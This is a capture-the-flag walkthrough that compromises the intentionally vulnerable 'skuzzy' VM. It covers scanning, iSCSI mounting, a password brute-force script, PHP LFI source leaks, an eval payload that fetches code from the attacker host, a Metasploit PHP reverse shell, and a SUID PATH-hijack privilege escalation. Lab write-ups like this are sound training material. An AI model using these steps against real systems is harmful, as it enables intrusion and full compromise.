[code]root@kali:~# nmap -T4 -A -v 192.168.1.23 Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-23 23:32 EDT NSE: Loaded 140 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:32 Completed NSE at 23:32, 0.00s elapsed Initiating NSE at 23:32 Completed NSE at 23:32, 0.00s elapsed Initiating ARP Ping Scan at 23:32 Scanning 192.168.1.23 [1 port] Completed ARP Ping Scan at 23:32, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 23:32 Completed Parallel DNS resolution of 1 host. at 23:32, 0.00s elapsed Initiating SYN Stealth Scan at 23:32 Scanning 192.168.1.23 [1000 ports] Discovered open port 80/tcp on 192.168.1.23 Discovered open port 22/tcp on 192.168.1.23 Discovered open port 3260/tcp on 192.168.1.23 Completed SYN Stealth Scan at 23:32, 0.06s elapsed (1000 total ports) Initiating Service scan at 23:32 Scanning 3 services on 192.168.1.23 Completed Service scan at 23:34, 93.78s elapsed (3 services on 1 host) Initiating OS detection (try #1) against 192.168.1.23 NSE: Script scanning 192.168.1.23. Initiating NSE at 23:34 Completed NSE at 23:34, 0.10s elapsed Initiating NSE at 23:34 Completed NSE at 23:34, 1.02s elapsed Nmap scan report for 192.168.1.23 Host is up (0.00032s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 89:c2:ae:12:d6:c5:19:4e:68:4a:28:e9:06:bd:9c:19 (RSA) |_ 256 f0:0c:ae:37:10:d3:6d:a2:85:3a:77:04:06:94:f8:0a (ECDSA) 80/tcp open http nginx | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: nginx |_http-title: Welcome! 3260/tcp open iscsi? |_iscsi-info: ERROR: Script execution failed (use -d to debug) MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.4 Uptime guess: 0.000 days (since Thu Mar 23 23:33:47 2017) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=257 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.31 ms 192.168.1.23 NSE: Script Post-scanning. Initiating NSE at 23:34 Completed NSE at 23:34, 0.00s elapsed Initiating NSE at 23:34 Completed NSE at 23:34, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 97.65 seconds Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)[/code][code]root@kali:~# dirb http://192.168.1.23 /usr/share/dirb/wordlists/big.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Mar 24 00:40:35 2017 URL_BASE: http://192.168.1.23/ WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt ----------------- GENERATED WORDS: 20458 ---- Scanning URL: http://192.168.1.23/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/ ---- Entering directory: http://192.168.1.23/smblogin/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/ ---- ==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/ ---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/ ---- ----------------- END_TIME: Fri Mar 24 00:42:14 2017 DOWNLOADED: 286412 - FOUND: 0[/code]Ok so a webserver and something named iscsi.
Nikto said noting to me.
dirbuster medium 2.3 dictionary said noting to me.
dirb with the big.txt dico found some smblogin portal. Everyting is forbitten and i cant seem to find things on it with google. I keep this in mind.
[code]sudo apt-get install open-iscsi nano /etc/iscsi/iscsid.conf (set node.startup to automatic) root@kali:~# /etc/init.d/open-iscsi restart [ ok ] Restarting open-iscsi (via systemctl): open-iscsi.service. root@kali:~# iscsiadm -m discovery -t st -p 192.168.1.23 192.168.1.23:3260,1 iqn.2017-02.local.skuzzy:storage.sys0 root@kali:~# iscsiadm -m node 192.168.1.23:3260,1 iqn.2017-02.local.skuzzy:storage.sys0 root@kali:~# iscsiadm -m node --targetname "iqn.2017-02.local.skuzzy:storage.sys0" --portal "192.168.1.23:3260" --login Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.23,3260] (multiple) Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.23,3260] successful.[/code]Next i am investigating on the silly iscsi port 3260. I do not know this but google does. It seems to be a sort of file server that can be mounted. Lets do that.
[code]root@kali:~# cd /media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/ root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# ls bobsdisk.dsk flag1.txt lost+found root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# cat flag1.txt Congratulations! You've discovered the first flag! flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd} Let's see how you go with the next one...[/code]First Flag!! :[code]root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# mkdir /bobsdisk root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# mount -o loop bobsdisk.dsk /bobsdisk root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# cd /bobsdisk/ root@kali:/bobsdisk# ls lost+found ToAlice.csv.enc ToAlice.eml[/code]Ok next into that mounted part i see a file named bobsdisk.dsk. I will mount that as well to find out what it is :[code]PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge... PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}[/code]Flag2 is inside ToAlice.eml with some clue.[code]#!/bin/bash # Build your list of candidates PASSWORDS=$(cat "./rockyou.txt") for PASSWORD in $PASSWORDS; do openssl enc -d -aes-256-cbc -in ToAlice.csv.enc -out ToAlice.csv -md sha256 -k $PASSWORD RET=$? if [ $RET -eq 0 ]; then cp ToAlice.csv ./working/ToAlice_$PASSWORD.csv fi done[/code]Ok so bobby here seems to want me to decrypt the csv file.... jeez decryption is not my cup of tea... so wikipedia tells me that the alg on october 2000 was aes-256-cbc. I tried to decrypt with the flag as passphrase but suuuuure it didint work. I sa on the message ROCKYOU in MAJ so i will use the rockyou.txt password list. I need to try them all... A little google search and i found a script that will do the job for me from http://stackoverflow.com/questions/25114571/decrypt-openssl-bruteforce[code]root@kali:~/decrypt/working# grep "flag" ./* ./ToAlice_supercalifragilisticoespialidoso.csv:flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it? [/code]So after16 hours... damnit XD i found hundreds of ToAlice_X.csv into the working file!
[code]Web Path,Reason 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?[/code]And i have the flag number 3. the csv file contain.[code]<html> <head> <title>Hackers! They're everywhere!</title> </head> <body bgcolor="black" text="#00ff00"> <center> <marquee width="50%"><font face="arial, helvetica" size="20">HACKER DETECTED! H$ <!-- Yeah, I'm bringing Marquee back, suckers! Just not in Chrome. Thanks, Google. Firefox is still rocking the marquee tag Ge$ --> <img src="hacker.jpg" /> </center> </body> </html> <!-- R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56 YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK -->[/code][code]George Costanza: [Soup Nazi gives him a look] Medium turkey chili. [instantly moves to the cashier] Jerry Seinfeld: Medium crab bisque. George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. Jerry Seinfeld: Just forget it. Let it go. George Costanza: Um, excuse me, I - I think you forgot my bread. Soup Nazi: Bread, $2 extra. George Costanza: $2? But everyone in front of me got free bread. Soup Nazi: You want bread? George Costanza: Yes, please. Soup Nazi: $3! George Costanza: What? Soup Nazi: NO FLAG FOR YOU[/code]PFFF noting interesting here the base64 translation :[code]?p=php://filter/convert.base64-encode/resource=xxxxxx.php[/code]Ok so next i will go and challenge the other website at c2444910794e037ebd8aaf257178c90b. I thinked i would be able to just redirect the reader to an url for a web_delivery, but it was not so easy. We need a key to do that. After i tried to use LFI to get a php shell up and running but even if it is directly on the ressource i received an auth key demand. (HERE) So i readed more about LFI and found that i can obtain a base64 version of the php pages that i want with this script. thanks phil at idontplaydart.[code]<?php defined ('VIAINDEX') or die('Ooooh! So close..'); ?> <h1>Flag</h1> Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time? <img src="trollface.png" /> <?php // Ok, ok. Here's your flag! // // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} // // Well done, you're doing great so far! // Next step. SHELL! // // // Oh. That flag above? You're gonna need it... ?>[/code]First of all i think its not healty to be that obsessed with base64 @vortexau! so with that i obtained the contant of flag.php and reader.php once decrypted they look like FLAG 4 flag.php[code]<?php defined ('VIAINDEX') or die('Ooooh! So close..'); ?> <h1>Feed Reader</h1> <?php if(isset($_GET['url'])) { $url = $_GET['url']; } else { print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>"); } if(isset($url) && strlen($url) != '') { // Setup some variables. $secretok = false; $keyneeded = true; // Localhost as a source doesn't need to use the key. if(preg_match("#^http://127.0.0.1#", $url)) { $keyneeded = false; $secretok = true; } // Handle the key validation when it's needed. if($keyneeded) { $key = $_GET['key']; if(is_array($key)) { die("Array trick is mitigated ;)"); } if(isset($key) && strlen($key) == '47') { $hashedkey = hash('sha256', $key); $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656"; // If you can use the following code for a timing attack // then good luck :) But.. You have the source anyway, right? :) if(strcmp($hashedkey, $secret) == 0) { $secretok = true; } else { die("Sorry... Authentication failed. Key was invalid."); } } else { die("Authentication invalid. You might need a key."); } } // Just to make sure the above key check was passed. if(!$secretok) { die("Something went wrong with the authentication process"); } // Now load the contents of the file we are reading, and parse // the super awesomeness of its contents! $f = file_get_contents($url); $text = preg_split("/##text##/s", $f); if(isset($text['1']) && strlen($text['1']) > 0) { print($text['1']); } print " "; $php = preg_split("/##php##/s", $f); if(isset($php['1']) && strlen($php['1']) > 0) { eval($php['1']); // "If Eval is the answer, you're asking the wrong question!" - SG // It hurts me to write insecure code like this, but it is in the // name of education, and FUN, so I'll let it slide this time. } }[/code]Reader.php[code]##php## eval(file_get_contents('http://192.168.1.14:8080/LcuwBoqEb')); print("workin"); ##php##[/code]Ok so here it is pretty straight foward. We need a 47 caracter key, in the flag.php it said we need this flag who it 47 car. So i will build a special web_delivery for metasploit and we will surely get shell. webdeliveryez.php[code]msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set target 1 target => 1 msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(web_delivery) > set uripath LcuwBoqEb uripath => LcuwBoqEb msf exploit(web_delivery) > set lhost 192.168.1.14 lhost => 192.168.1.14 msf exploit(web_delivery) > run [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.1.14:4444 msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/LcuwBoqEb [*] Local IP: http://192.168.1.14:8080/LcuwBoqEb [*] Server started. [*] Run the following command on the target machine: php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.14:8080/LcuwBoqEb'));"[/code]Settin metasploit :[code]http://192.168.1.23/c2444910794e037ebd8aaf257178c90b/?p=reader&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=http://192.168.1.14/webdeliveryphpez.php[/code]After just accessed the url :[code]sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 2379 created. Channel 0 created. python -c 'import pty; pty.spawn("/bin/bash")' www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ [/code]Annnnnd we got a shell![code]================================================================================================= LINUX PRIVILEGE ESCALATION CHECKER ================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel Linux version 4.4.0-64-generic (buildd@lgw01-56) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017 [+] Hostname skuzzy [+] Operating System __ _____ _____ | | | __|_ _ _ | __|___ _ _ ___ ___ _ _| | | __| | | | |__ | _| | |- _|- _| | |__| |_____|_____| |_____|___|___|___|___|_ |__| |___| Intentionally Vulnerable VM! Do not expose to the Internet! Developed By - vortex twitter: @vortexau email: [email protected] Hints available at /dev/null (or ping me on Twitter) Assigned IP: 192.168.1.23/24 [*] GETTING NETWORKING INFO... [+] SUID/SGID Files and Directories -rwsr-xr-x 1 root root 8736 Mar 2 22:56 /opt/alicebackup [/code]Next we need to run some private escalation scripts. I will save you the hussle of posting the full results here, i readed it all and i found something interesting[code]www-data@skuzzy:/tmp$ /opt/alicebackup /opt/alicebackup uid=0(root) gid=0(root) groups=0(root),33(www-data) ssh: Could not resolve hostname alice.home: Name or service not known lost connection[/code]Ok so here we see a script named alice backup that is runned with root priv..! lets fire it up:[code]cp /bin/sh /tmp/id[/code]Ok so interesting the script fire up id command, try to connect via ssh and die. If i poison the id process to fireup a shell, i think it would work. So lets see[code]www-data@skuzzy:/tmp$ export PATH=/tmp:$PATH export PATH=/tmp:$PATH www-data@skuzzy:/tmp$ echo $PATH echo $PATH /tmp:/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:. www-data@skuzzy:/tmp$ [/code]And next add tmp at the start of the PATH so it will fire up mine insted of the real one.[code] www-data@skuzzy:/tmp$ /opt/alicebackup /opt/alicebackup # whoami whoami root # cd /root cd /root # ls ls flag.txt # cat flag.txt cat flag.txt Congratulations! flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a} You've found the final flag and pwned this CTF VM! I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last! I'd love to hear your thoughts on this one. Too easy? Too hard? Too much stuff to install to get the iSCSI initiator working? Drop me a line on twitter @vortexau, or via email [email protected][/code]Exploit it end we see the FLAG 5Like a chief M.